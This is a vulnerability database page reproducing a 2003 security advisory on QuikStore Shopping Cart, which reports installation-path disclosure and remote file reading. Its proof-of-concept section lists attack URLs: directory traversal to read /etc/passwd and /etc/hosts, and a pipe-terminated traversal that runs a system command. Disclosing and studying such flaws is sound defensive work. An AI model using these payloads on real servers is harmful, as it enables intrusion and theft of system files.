Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

quikstore.txt

🗓️ 29 Dec 2003 00:00:00Reported by Dr'PonidiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 72 Views

QuikStore Shopping Cart exposes installation paths and files to remote users via error messages.

Code
`Indonesia Security Development Team Advisory  
  
QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users   
=====================================================================  
  
Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users   
Release Date: 5:08 23/12/03  
Application: QuikStore Shopping Cart   
Author: Dr`Ponidi <[email protected]>   
Discover by: Dr`Ponidi <[email protected]>  
Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi  
Vendor Status: The vendor has been contacted   
Vendor URL: http://www.quikstore.com  
Reference: http://drponidi.5u.com/advisory.htm  
Greetz to: #indohack #k-elektronik #dhegleng @ dal.net  
  
[Details]  
A remote user can reportedly send request to cause the system  
to display an error message that indicates the installation path.  
It's possible to make a malformed http request for many files in  
QuikStore Shopping Cart and in doing so trigger an error.  
The resulting error message will disclose potentially sensitive installation  
path information to the remote attacker.QuikStore Shopping Cart allows remote  
file reading too, users can view files on the system with the privileges of the web server.   
  
[Proof of Concept]  
http://[target]/cgi-bin/quikstore.cgi?store='  
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html  
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts  
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|  
  
[Suggestions]  
Filter all files  
  
[Patch:]  
Not yet available  
  
[About Indonesia Security Development Team]  
Indonesia Security Development Team researches and develops  
intelligent, advanced application security assessment. Based in  
Indonesia, Indonesia Security Development Team offers the best of  
breed security consulting services, specializing in shopping carts   
software and network security assessments. We provide security   
information and patches for use by the entire network security community.  
  
  
  
This information is provided freely to all interested parties and may  
be redistributed provided that it is not altered in any way, and that  
the author is appropriately credited  
  
Indonesia Security Development Team Advisory:  
http://drponidi.5u.com/advisory.htm  
_______________________________________________________________  
Dr`Ponidi <[email protected]>  
Original document can be fount at http://drponidi.5u.com/advisory.htm  
  
  
  
  
--   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Dec 2003 00:00Current
7.4High risk
Vulners AI Score7.4
quikstore shopping cartremote file readingerror message disclosureinstallation path exposurevulnerability advisory.
72